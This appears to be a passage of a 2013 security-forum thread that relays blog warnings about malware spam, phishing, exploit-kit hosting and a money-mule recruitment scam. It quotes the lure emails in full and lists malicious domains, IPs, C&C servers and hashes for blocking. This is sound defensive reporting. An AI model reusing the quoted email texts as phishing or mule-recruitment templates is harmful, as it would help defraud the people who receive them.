15 Jan - "This fake Verizon Wireless spam leads to malware on dmssmgf .ru:
From: Friendster Games [mailto:friendstergames @friendster .com]
Sent: 14 January 2013 21:47
Subject: Verizon Wireless
IMPORTANT ACCOUNT NOTE FROM VERIZON WIRELESS.
Your acknowledgment message is issued.
Your account No. ending in 2308
Dear Client
For your accommodation, your confirmation letter can be found in the Account Documentation desk of My Verizon.
Please browse your informational message for more details relating to your new transaction.
Open Information Message
In addition, in My Verizon you will find links to information about your device & services that may be helpfull if you looking for answers.
Thank you for joining us. My Verizon is laso works 24 hours 7 days a week to assist you with:
• Viewing your utilization
• Upgrade your tariff
• Manage Account Members
• Pay for your bill
• And much, much more...
2013 Verizon Wireless
Verizon Wireless | One Verizon Way Mail Code: 113WVC | Basking Ridge, MI 87325
We respect your privacy. Please browse our policy for more information
The malicious payload is on [donotclick]dmssmgf .ru:8080/forum/links/column.php (report here) hosted on:
81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)
91.224.135.20 (Proservis UAB, Luthunia)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are all connected:
81.31.47.124
91.224.135.20
212.112.207.15
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru "
:fear::fear:
AplusWebMaster
2013-01-16, 18:26
FYI...
Fake EFTPS, BBB and Fed Reserve SPAM
- http://www.gfi.com/blog/email-threats-highlights-eftps-bbb-and-federal-reserve-spam/
Jan 16, 2013 - "... the AV Labs have captured and recorded* a number of notable email threats last week — generally spam related to malware...
- Fake BBB Complaints Spam...
- Fake EFTPS Spam...
- FedMail ACH Spam... leads to Cridex
Users are advised to mark the above email threats as spam if they’re found in their inbox and then/or simply delete them."
(Screenshots available at the gfi URL above.)
* http://gfisoftware.tumblr.com/
___
Fake American Express SPAM / dozakialko .ru
- http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html
16 Jan 2013 - "This fake AmEx spam leads to malware on dozakialko .ru:
Sent: 16 January 2013 02:22
Subject: American Express Alert: Your Transaction is Aborted
Your Wed, 16 Jan 2013 01:22:07 -0100 Incoming Transfer is Terminated
Valued, $5203
Your American Express Card account retired ZUE36213 with amount of 5070 USD.
Transaction Time:Wed, 16 Jan 2013 01:22:07 -0100
Payment Due Date:Wed, 16 Jan 2013 01:22:07 -0100
One small way to help the environment - get paperless statements
Review billing
statement
Issue a payment
Change notifications
options
You currently reading the LIMITED DATA version of the Statement-Ready Information.
Switch to the DETAILED DATA version.
Thank you for your Cardmembership.
Sincerely,
American Express Information center
The malicious payload is at [donotclick]dozakialko .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)
Plain list of IPs and related domains for copy-and-pasting:
89.111.176.125
91.224.135.20
212.112.207.15
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dozakialko .ru ..."
* http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js
___
Fake EFTPS emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/16/batch-payment-file-declined-eftps-themed-emails-lead-to-black-hole-exploit-kit/
Jan 16, 2013 - "Cybercriminals are currently mass mailing tens of thousands of emails, impersonating the EFTPS (Electronic Federal Tax Payment System), in an attempt to trick its users into clicking on exploits and malware serving malicious links found in the emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_malware_exploits_black_hole_exploit_kit_eftps_batch_payment_declined.png
... Upon succcessful clienet-side exploitation, the campaign drops MD5: d35a52d639468c2c4c857e6629b3f6f0 * ... Worm:Win32/Cridex.E.
Once executed, the sample phones back to the following command and control servers:
109.230.229.250:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA
163.23.107.65:8080
174.142.68.239:8080
81.93.250.157:8080
180.235.150.72:8080
109.230.229.70:8080
95.142.167.193:8080
217.65.100.41:8080
188.120.226.30:8080
193.68.82.68:8080
203.217.147.52:8080
210.56.23.100:8080
221.143.48.6:8080
182.237.17.180:8080
59.90.221.6:8080
64.76.19.236:8080
69.64.89.82:8080
173.201.177.77:8080
78.28.120.32:8080
174.120.86.115:8080
74.207.237.170:8080
77.58.193.43:8080
94.20.30.91:8080
84.22.100.108:8080
87.229.26.138:8080
97.74.113.229:8080
We’ve already seen the same pseudo-random C&C characters used in... previously profiled malicious campaigns..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/d9ca9dd90a250870c8a06665f8d86f088b5ebdca36457bf18347693ee0e71830/analysis/
File name: calc.exe
Detection ratio: 25/46
Analysis date: 2013-01-14
___
Fake ADP SPAM / teamrobotmusic .net
- http://blog.dynamoo.com/2013/01/adp-spam-teamrobotmusicnet.html
16 Jan 2013 - "This fake ADP spam leads to malware on teamrobotmusic .net:
Date: Wed, 16 Jan 2013 18:36:25 +0200 [11:36:25 EST]
From: "notify @adp .com" [notify @adp .com]
Subject: ADP Speedy Information
ADP Speedy Communication
[redacted]
Reference ID: 14580
Dear ADP Client January, 16 2012
Your Money Transfer Statement(s) have been uploaded to the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following details:
• Please note that your bank account will be charged-off within 1 business day for the value(s) specified on the Record(s).
•Please don't reply to this message. auomatic informational system unable to accept incoming email. Please Contact your ADP Benefits Expert.
This email was sent to acting users in your company that access ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 14580
The malicious payload is on [donotclick]teamrobotmusic .net/detects/bits_remember_confident.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in a few attacks recently and should be blocked if you can..."
:mad::fear::mad:
AplusWebMaster
2013-01-17, 15:31
FYI...
Fake Vodafone emails serve malware
- http://blog.webroot.com/2013/01/17/cybercriminals-resume-spamvertising-fake-vodafone-a-new-picture-or-video-message-themed-emails-serve-malware/
Jan 17, 2013 - "Over the past 24 hours, cybercriminals resumed spamvertising fake Vodafone MMS themed emails, in an attempt to trick the company’s customers into executing the malicious attachment found in these emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_vodafone_mms_malware.png
Detection rate for the malicious executable:
MD5: bafebf4cdf640520e6266eb05b55d7c5 * ... Trojan-Downloader.Win32.Andromeda.pfu.
Once executed, the sample creates the following Registry values:
\Software\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -> “C:\Documents and Settings\All Users\svchost.exe“
It also copies itself to other locations, and injects code in other processess. We intercepted a similar campaign last year, indicating that, depending on the campaign in question, cybercriminals are not always interested in popping up on everyone’s radar with persistent and systematic spamvertising of campaigns using identical templates. Instead, some of their campaigns tend to have a rather short-lived life cycle. We believe this practice is entirely based on the click-through rates for malicious URLs and actual statistics on the number of people that executed the malicious samples..."
* https://www.virustotal.com/file/f88990ff5b2f8621ffa1056d5cf977949e624802c43a8f511dae0d590fa8185c/analysis/1358366804/
File name: MMS.jpg.exe
Detection ratio: 21/46
Analysis date: 2013-01-16
___
Fake KeyBank "secure message" virus
- http://blog.dynamoo.com/2013/01/keybankcom-you-have-received-secure.html
17 Jan 2013 - "This fake KeyBank spam has an attachment called securedoc.zip which contains a malicous executable file named securedoc.exe.
Date: Thu, 17 Jan 2013 11:16:54 -0500 [11:16:54 EST]
From: "Antoine_Pearce @KeyBank .com" [Antoine_Pearce @KeyBank .com]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SECUREDOC. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key's e-mail encryption service, please contact technical support at 888.764.7941.
First time users - will need to register after opening the attachment.
Help - https ://mailsafe.keybank .com/websafe/help?topic=RegEnvelope
About IronPort Encryption - https ://mailsafe.keybank .com/websafe/about
VirusTotal results are not good*. The ThreatExpert report for the malware can be found here**. The malware attempts to call home to:
173.230.139.4 (Linode, US)
192.155.83.208 (Linode, US)
..and download additional components from
[donotclick]ib-blaschke .de/4kzWUR.exe
[donotclick]chris-zukunftswege .de/DynThR8.exe
[donotclick]blueyellowbook .com/Cct1Kk58.exe ..."
* https://www.virustotal.com/file/ef538c20fd4b836aa220becef9239d72b78d527e9a85107883e5031105b4ed11/analysis/1358440323/
File name: securedoc.exe
Detection ratio: 5/46
Analysis date: 2013-01-17
** http://www.threatexpert.com/report.aspx?md5=315b81b62fb81baa990f1317f1b68610
___
Fake Wire Transfer SPAM / dfudont .ru
- http://blog.dynamoo.com/2013/01/wire-transfer-confirmation-spam.html
17 Jan 2013 - "This spam leads to malware on dfudont .ru:
Date: Fri, 18 Jan 2013 08:58:56 +0600 [21:58:56 EST]
From: SUMMERDnIKYkatTerry @aol .com
Subject: Fwd: Wire Transfer Confirmation (FED_59983S76643)
Dear Bank Account Operator,
WIRE TRANSFER: FED86180794682707910
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]dfudont .ru:8080/forum/links/column.php hosted on:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)
These IPs have been used in several malware attacks recently - blocking them is a good idea. The following malicious domains are also present on these servers:
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
damagalko .ru
dozakialko .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dfudont .ru
Update: there is also a fake Sendspace spam sending visitors to the same payload...
Date: Thu, 17 Jan 2013 03:03:55 +0430
From: Badoo [noreply @badoo .com]
Subject: You have been sent a file (Filename: [redacted]_N584581.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]_N390.pdf, (973.39 KB) waiting to be downloaded at sendspace.(It was sent by JOHNETTE ).
You can use the following link to retrieve your file:
Download
Thank you,
Sendspace, the best free file sharing service.
:mad:
AplusWebMaster
2013-01-18, 03:44
FYI...
Fake Java update is malware
- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/
Jan 17, 2013 - "... We were alerted to reports of a malware that poses as Java Update 11 created by an unknown publisher. The said fake update in question is javaupdate11.jar (detected as JAVA_DLOADER.NTW), which contains javaupdate11.class that downloads and executes malicious files up1.exe and up2.exe (both detected as BKDR_ANDROM.NTW). Once executed, this backdoor connects to a remote server that enables a possible attacker to take control of the infected system. Users can get this fake update by visiting the malicious website, {BLOCKED}currencyreport .com/cybercrime-suspect-arrested/javaupdate11.jar.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/01/fake_java_update_site.gif
Though the dropped malware does not exploit CVE-2012-3174 or any Java-related vulnerability, the bad guys behind this threat is clearly piggybacking on the Java zero-day incident and users’ fears. The use of fake software updates is an old social engineering tactic. This is not the first time that cybercriminals took advantage of software updates. Last year, we reported about a malware disguised as a Yahoo! Messenger, which we found in time for Yahoo!’s announcement of its update for Messenger..."
:mad:
AplusWebMaster
2013-01-18, 16:57
FYI...
Fake "A.R.T. Logistics" job offer
- http://blog.dynamoo.com/2013/01/art-logistics-fake-job-offer.html
18 Jan 2013 - "There may be various genuine companies in the world with a name similar to "A.R.T. Logistics Industrial & Trading Ltd", but this job offer does not come from a genuine company. Instead it is trying to recruit people for money laundering ("money mule") jobs and parcel reshipping scams (a way of laundering stolen goods). Note that the scammers aren't even consistent in the way they name the company.
From: ART LOGISTICS INDUSTRIAL AND TRADING LTD [info@sender .org]
Reply-To: artlogisticsltd @yahoo .com.ph
Date: 18 January 2013 07:49
Subject: A.R.T. LOGISTICS INDUSTRIAL & TRADING LIMITED
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
Export & Import Agent‚ Service Company.
46/F Tower 1, Metroplaza 223 Hing Fong Road,
Kwai Chung New Territories, Hong Kong.
A.R.T. Logistics mainly provides services to customers in Russia, Kazakhstan and Hong Kong. We provide: - Air freight - Sea freight (FCL & LCL to EU, Russia, Kazakhstan & Central Asia) - Rail freight - Road Freight (FTL & LTL to any place in Russia, Kazakhstan and Central Asia) Our company has worked in Russia, Kazakhstan & Central Asia since 2005 and has wide experience of transport such as airfreight, container and rail.
We are presently shifting our base to North America and we have collective customers in the United State & Canada but We find it difficult establishing payments modalities with this customers and we don't intend loosing our customers. We are searching for a front line representative as intermediary by establishing a medium of getting payments from this customers in Canada & America by making payments through you to us. Do contact us for more information at this e-mail: (artlogis @e-mail .ua).
Subject to your satisfaction with the front line representative offer, you will be made our foreign payment receiving officer in your region and you will deduct 10% of every transactions made through you for your services as our Financial Representative.
Sincerely,
Yasar Feng Xu
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
N.B Reply to: artlogisticsltd @yahoo .com.ph
In this case, the spam originates from 31.186.186.2 [mail.zsmirotice .cz]. Avoid!"
___
Shylock banking trojan travels by Skype
- http://h-online.com/-1786928
18 Jan 2013 - "The banking trojan Shylock has found itself a new distribution channel – Skype. The security firm CSIS* recently discovered a Shylock module called "msg.gsm" trying to use the VoIP software to infect other computers. If successful, the malware then sets up a typical backdoor. The module tries to send Shylock as a file, bypassing warnings from the Skype software by confirming them itself and cleaning any generated messages from the Skype history. Once the trojan has been transferred it connects to a command and control server which can ask it to install a VNC server allowing remote control of the computer, get cookies, inject HTTP code into web sites being browsed, spread Shylock over removable drives, or upload files to a server. The epicenter of infections is, according to CSIS, the UK... At the time of writing, the most recent VirusTotal test** shows 15 of the engines now detecting it..."
* https://www.csis.dk/en/csis/blog/3811/
** https://www.virustotal.com/file/4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842/analysis/
File name: 8fbeb78b06985c3188562e2f1b82d57d
Detection ratio: 15/46
Analysis date: 2013-01-18
___
Fake LinkedIn SPAM / shininghill .net
- http://blog.dynamoo.com/2013/01/linkedin-spam-shininghillnet.html
18 Jan 2013 - "This fake LinkedIn spam leads to malware on shininghill .net:
Date: Fri, 18 Jan 2013 18:16:32 +0200
From: "LinkedIn" [announce@e .linkedin .com]
Subject: LinkedIn Information service message
LinkedIn
REMINDERS
Invite notifications:
? From MiaDiaz ( Your renter)
PENDING EVENTS
∙ There are a total of 2 messages awaiting your response. Enter your InBox right now.
Don't want to get email info letters? Change your message settings.
LinkedIn values your privacy. Not once has LinkedIn made your e-mail address available to any another LinkedIn member without your permission. © 2013, LinkedIn Corporation.
The malicious payload is at [donotclick]shininghill.net/detects/solved-surely-considerable.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP address has been used in several recent attacks and should be blocked if you can.
The following domains appear to be active on this IP address, all should be considered to be malicious..."
(More detail at the dynamoo URL above.)
___
Fake ADP SPAM / dopaminko .ru
- http://blog.dynamoo.com/2013/01/adp-spam-dopaminkoru.html
18 Jan 2013 - "This fake ADP spam leads to malware on dopaminko .ru:
Date: Fri, 18 Jan 2013 09:08:38 -0500
From: "service @paypal .com" [service @paypal .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 544043911
Fri, 18 Jan 2013 09:08:38 -0500
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.lexdirect.adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 206179035
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is at [donotclick]dopaminko .ru:8080/forum/links/column.php hosted on the following familiar IP addresses:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)
These following malicious domains appear to be active on these servers..."
(More detail at the dynamoo URL above.)
:mad: :mad:
AplusWebMaster
2013-01-21, 16:09
FYI...
Phishers target UnionBank of the Philippines clients
- http://www.gfi.com/blog/phishers-target-unionbank-of-the-philippines-clients/
Jan 21, 2013 - "We have been alerted by an ongoing phishing campaign that targets clients and online banking users of the UnionBank of the Philippines. The phishing URL, which is being sent to users in the form of spam, is found hosted on a legitimate but compromised Russian domain. We have also found previous records of the said domain hosting a different phishing page a few days ago. The spam entices users to visit a certain URL to “reactivate” their account... This phishing page has closely mimicked the look or template of legitimate pages where users can enter their sensitive banking information... Once users have entered and submitted their information, a confirmation window pops up and then users are redirected to the legitimate UnionBank website... Most UnionBank users have their PayPal accounts tied to their banking accounts, so it is very important to steer clear from emails claiming to be from the bank that ask for banking details... better call them and inquire about the email you receive just to be sure. It also pays to consult this Anti-Fraud and Anti-Phishing Guidelines page* from UnionBank for guidance on how to identify phishing pages from the real ones."
* http://www.unionbankph.com/index.php?option=com_content&view=article&id=1083&Itemid=472
(Screenshots available at the gfi URL above.)
___
Malware Masks as Latest Java Update
- http://www.gfi.com/blog/malware-masks-as-latest-java-update/
Jan 21, 2013 - "... security experts have discovered a new zero-day, critical flaw on Java not so long ago and is already integrated into popular exploit kits, such as Blackhole, Redkit, Cool and Nuclear Pack. The said flaw, once exploited, is said to allow remote code execution on a target system without authentication from the user. This, of course, gives malware files the upper hand if users visit sites/URLs where they are hosted. Immediately after the vulnerability is found, Oracle has released its patch. Despite this speedy response from the company, many security experts have already began advising users to just forget the patch and disable Java in their browsers. Perhaps some users have already made the move of disabling Java entirely, or perhaps some users have opted still to apply the patch. If you belong in the former group, latter group, let this be our reminder to you: Please make sure that you’re downloading the patch straight from the Oracle website* and nowhere else because it’s highly likely that what you may be installing onto your system is malware**..."
* http://java.com/en/download/index.jsp
** http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/
___
Kenyan Judiciary (judiciary .go.ke) hacked to serve malware
- http://blog.dynamoo.com/2013/01/kenyan-judiciary-judiciarygoke-hacked.html
21 Jan 2013 - "The Judiciary of the Republic of Kenya has a mission to deliver justice fairly, impartially and expeditiously, promote equal access to justice, and advance local jurispudence by upholding the rule of law. Unfortunately, it has also been hacked to serve up malware.
> https://lh3.ggpht.com/-DbemA5jmT9g/UP0RScKxfPI/AAAAAAAAA4g/XaSZN1V3jjM/s400/judiciary-go-ke.png
The site has been compromised to serve up an exploit kit being promoted by spam email. There's a redirector at [donotclick]www.judiciary .go.ke /wlc.htm attempting to redirect visitors to [donotclick]dfudont .ru:8080/forum/links/column.php where there's a nasty exploit kit.
> https://lh3.ggpht.com/-OhchceHjVws/UP0aGR02XlI/AAAAAAAAA40/q9qYel1t7lU/s400/judiciary-go-ke2.png
Of course, most visitors to the judiciary .go.ke site won't see that particular exploit. But if someone can create an arbitrary HTML page on that server, then they pretty much have the run of the whole thing and they can do what they like. So the question might be.. what else has been compromised? Hmm."
___
LinkedIn spam / prepadav .com
- http://blog.dynamoo.com/2013/01/linkedin-spam-prepadavcom.html
21 Jan 2013 - "This fake LinkedIn spam leads to malware on prepadav .com:
From: LinkedIn [mailto :news@ linkedin .com]
Sent: 21 January 2013 16:21
Subject: LinkedIn Reminder from your co-worker
LinkedIn
REMINDERS
Invitation reminders:
From CooperWright ( Your employer)
PENDING LETTERS
• There are a total of 2 messages awaiting your action. Acces to your InBox now.
Don't wish to receive email notifications? Adjust your letters settings.
LinkedIn respect your privacy. In no circumstances has LinkedIn made your e-mail acceptable to any other LinkedIn user without your allowance. © 2013, LinkedIn Corporation.
The malicious payload is at [donotclick]prepadav .com/detects/region_applied-depending.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in several malware attacks recently and it should be blocked if you can..."
___
Fake Intuit SPAM / danadala .ru
- http://blog.dynamoo.com/2013/01/intuit-spam-danadalaru.html
21 Jan 2013 - "This fake Intuit spam leads to malware on danadala .ru:
Date: Mon, 21 Jan 2013 04:45:31 -0300
From: RylieBouthillette @hotmail .com
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Mon, 21 Jan 2013 04:45:31 -0300.
Finances would be gone away from below account # ending in 8134 on Mon, 21 Jan 2013 04:45:31 -0300
amount to be seceded: 5670 USD
Paychecks would be procrastinated to your personnel accounts on: Mon, 21 Jan 2013 04:45:31 -0300
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]danadala .ru:8080/forum/links/column.php hosted on a familiar bunch of IPs that have been used in several recent attacks:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)..."
:mad::mad: :fear:
AplusWebMaster
2013-01-22, 17:03
FYI...
Blackhole exploit kit on avirasecureserver .com
- http://blog.dynamoo.com/2013/01/cheeky-exploit-kit-on.html
22 Jan 2013 - "What is avirasecureserver .com? Well, it's not Avira that's for sure.. it is in fact a server for the Blackhole Exploit Kit*. This site is hosted on 82.145.57.3, an Iomart / Rapidswitch IP... There's also no company in the UK called QHoster Ltd. In fact, if we check the QHoster.com domain we can see that it is a Bulgarian firm... QHoster has an IP block of 82.145.57.0/25 suballocated to it. A quick poke around indicates not much of value in this range, you may want to consider blocking the /25 as a precaution."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=788732
- https://www.google.com/safebrowsing/diagnostic?site=AS:20860
"Of the 18705 site(s) we tested on this network over the past 90 days, 1489 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-21... Over the past 90 days, we found 14 site(s) on this network... that appeared to function as intermediaries for the infection of 670 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s)... that infected 1080 other site(s)..."
___
'Droid malware spreads through compromised legitimate Web sites
- http://blog.webroot.com/2013/01/22/android-malware-spreads-through-compromised-legitimate-web-sites/
22 Jan 2013 - "... our sensor networks picked up an interesting website infection affecting a popular Bulgarian website for branded watches, which ultimately redirects and downloads premium rate SMS Android malware on the visiting user devices. The affected Bulgarian website is only the tip of the iceberg, based on the diversified portfolio of malicious domains known to have been launched by the same party that launched the original campaign...
Sample screenshot of the executed Android malware:
> https://webrootblog.files.wordpress.com/2013/01/android_malware_fake_adobe_flash_player_fake_android_browser_fake_google_play_applications.png
... Sample malicious URLs displayed to Android users:
hxxp ://adobeflashplayer-up .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxxp ://googleplaynew .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxp ://browsernew-update .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
... Detection rate for the malicious .apk files:
flash_player_installer.apk – MD5: 29e8db2c055574e26fd0b47859e78c0e * ... Android.SmsSend.212.origin.
Android_installer-1.apk – MD5: e6be5815a05c309a81236d82fec631c8 * ... HEUR:Trojan-SMS.AndroidOS.Opfake.bo.
... Upon execution, the Android sample phones back to gaga01 .net/rq.php – 93.170.107.57 – Email: mypiupiu1 @gmail.com transmitting..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/2076cb718edae12fa641a6b28cc53aee8d9d495518836bcc24e8e8bd1172f892/analysis/1358799096/
File name: flash_player_installer.apk
Detection ratio: 5/46
Analysis date: 2013-01-21
** https://www.virustotal.com/file/68991103bd0eb8594f528065fe93c1388de864da3f0e08d358eb7276f28d4f7d/analysis/1358799258/
File name: Android_installer-1.apk
Detection ratio: 5/46
Analysis date: 2013-01-21
> https://www.google.com/safebrowsing/diagnostic?site=AS:57062
"Of the 2027 site(s) we tested on this network over the past 90 days, 23 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-22... Over the past 90 days, we found 75 site(s) on this network... that appeared to function as intermediaries for the infection of 104 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 496 site(s)... that infected 1485 other site(s)..."
___
Something evil on 109.123.66.30
- http://blog.dynamoo.com/2013/01/something-evil-on-1091236630.html
22 January 2013 - "109.123.66.30 (UK2.NET, UK) hosts several domains containing the Blackhole Exploit Kit (example here*). The domains in user are (mostly) legitimate hacked domains, but there are a couple of odd things here. Most of the malicious domains have a format like this: 700ff4ad03c655cb11919113011611137102708d4fb6daf0e74bea4aa5e8f9f.darkhands .com - in this case darkhands .com is a legitimate domain registered to an individual in Australia, but it has been hacked to create a who load of malicious subdomains, hosted on another server from www .darkhands .com. In fact, almost all the domains are registered to Australians, but the key thing is in that all of those cases the main domains are hosted by OrionVM in Australia, with the main domains hosted in the 49.156.18.0/24 block. So how can the main (legitimate) sites be hosted in 49.156.18.0/24, but the malicious subdomains are hosted on a completely different network in the UK. I suspect that there is a compromise of some sort at OrionVM which has allowed the DNS records to be change (it should be noted that these domains used several different registrars). Another oddity is that these hijacked domains only go from A to I alphabetically, which indicates that there might be some other malicious servers in this same group... Also hosted on 109.123.66.30 are some malicious .in domains that were previously on 87.229.26.138 (see here**)... It looks like there are some legitimate sites on the same server, but blocking 109.123.66.30 is probably a good idea."
(Long list of domains at the dynamoo URL above.)
* http://urlquery.net/report.php?id=796905
** http://blog.dynamoo.com/2012/12/something-evil-on-8722926138.html
___
Fake Swiss tax SPAM / africanbeat .net
- http://blog.dynamoo.com/2013/01/dutch-language-swiss-tax-spam.html
22 Jan 2013 - "This Nederlands language spam appears to be from some Swiss tax authority, but in fact it leads to the Blackhole Exploit kit on africanbeat .net:
From: report@ ag .ch via bernina .co .il
Date: 22 January 2013 13:48
Subject: Re: je NAT3799 belastingformulier
Mailed-by: bernina .co .il
[redacted]
Wij willen brengen aan uw bericht dat je hebt fouten gemaakt bij het invullen van de meest recente belastingformulier NAT3799 (ID: 023520).
vindt u aanbevelingen en tips van onze fiscalisten HIER
( Wacht 2 minuten op het verslag te laden)
Wij verzoeken u om corrigeer de fouten en verzenden de gecorrigeerd aangifte aan uw belastingadviseur zo snel mogelijk.
Kanton Aargau
Sonja Urech
Sachbearbeiterin Wehrpflichtersatzverwaltung
Departement Gesundheit und Soziales
Abteilung Militär und Bevölkerungsschutz
Rohrerstrasse 7, Postfach, 6253 Aarau
Tel.: +41 (0)62 332 31 62
Fax: +41 (0)62 332 33 18
Translated as:
We want to bring to your notice that you have made mistakes when completing the most recent tax form NAT3799 (ID: 023520).
You can find recommendations and tips from our tax specialists HERE
(Wait 2 minutes for the report to load)
We ask you to correct the error and send the corrected report to your tax advisor as soon as possible.
The link leads to an exploit kit at [donotclick]africanbeat .net/detects/urgent.php (report here*) hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea)..."
(More at the dynamoo URL above.)
* http://urlquery.net/report.php?id=801678
:mad: :fear:
AplusWebMaster
2013-01-23, 15:31
FYI...
Fake Intuit emails lead to Black Hole Exploit Kit
- http://blog.webroot.com/2013/01/23/fake-intuit-direct-deposit-service-informer-themed-emails-lead-to-black-hole-exploit-kit/
Jan 23, 2013 - "Cybercriminals are currently spamvertising tens of thousands of fake emails, impersonating Intuit, in an attempt to trick its customers and users into clicking on the malicious links found in the emails. Once users click on any of the links, they’re exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit, which ultimately drops malware on the affected hosts...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_intuit_direct_deposit_service_informer_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
dopaminko .ru – 212.112.207.15
Name server: ns1.dopaminko .ru – 62.76.185.169
Name server: ns2.dopaminko .ru – 41.168.5.140
Name server: ns3.dopaminko .ru – 42.121.116.38
Name server: ns4.dopaminko .ru – 110.164.58.250
Name server: ns5.dopaminko .ru – 210.71.250.131
More malicious domains are known to have responded to the same IP (212.112.207.15)...
Some of these domains also respond to the following IPs – 91.224.135.20; 46.175.224.21, with more malicious domains part of the campaign’s infrastructure..."
(More detail at the webroot URL above.)
___
Phishing Scam spreads via Facebook PM
- http://www.gfi.com/blog/phishing-scam-spreads-via-facebook-pm/
Jan 23, 2013 - "We’ve seen a number of cases wherein phishers have used compromised Twitter accounts to send direct messages (DMs) to their followers. We’re now beginning to see this same tactic used in Facebook in the form of private messages (PMs), and this isn’t just some spam mail in your inbox claiming you have received a “private message”... Recipients can act on this message in two ways: they can click the link to confirm their account, or simply ignore the message and delete it from their message inbox. Users who do the latter are guaranteed to be safe from this sort of scam. Users who do the former, however, are led to a single site where they can enter all personal information asked from them... Unsolicited messages from phishers landing on your private message inbox are no longer limited to Twitter. Despite this old method being used in a different platform, our advice on how to avoid falling for such scams remain the same: Always check the URL to be sure you’re not going to visit a link that is completely unrelated to Facebook—”Think before you click”, remember?; be skeptical about messages claiming to have come from Facebook; lastly, never share the URL to anyone on Facebook or on your other social sites as this only increases the possibility of someone clicking the link and getting phished themselves."
(Screenshots available at the gfi URL above.)
___
Fake NACHA SPAM / canonicalgrumbles .biz
- http://blog.dynamoo.com/2013/01/nacha-spam-canonicalgrumblesbiz.html
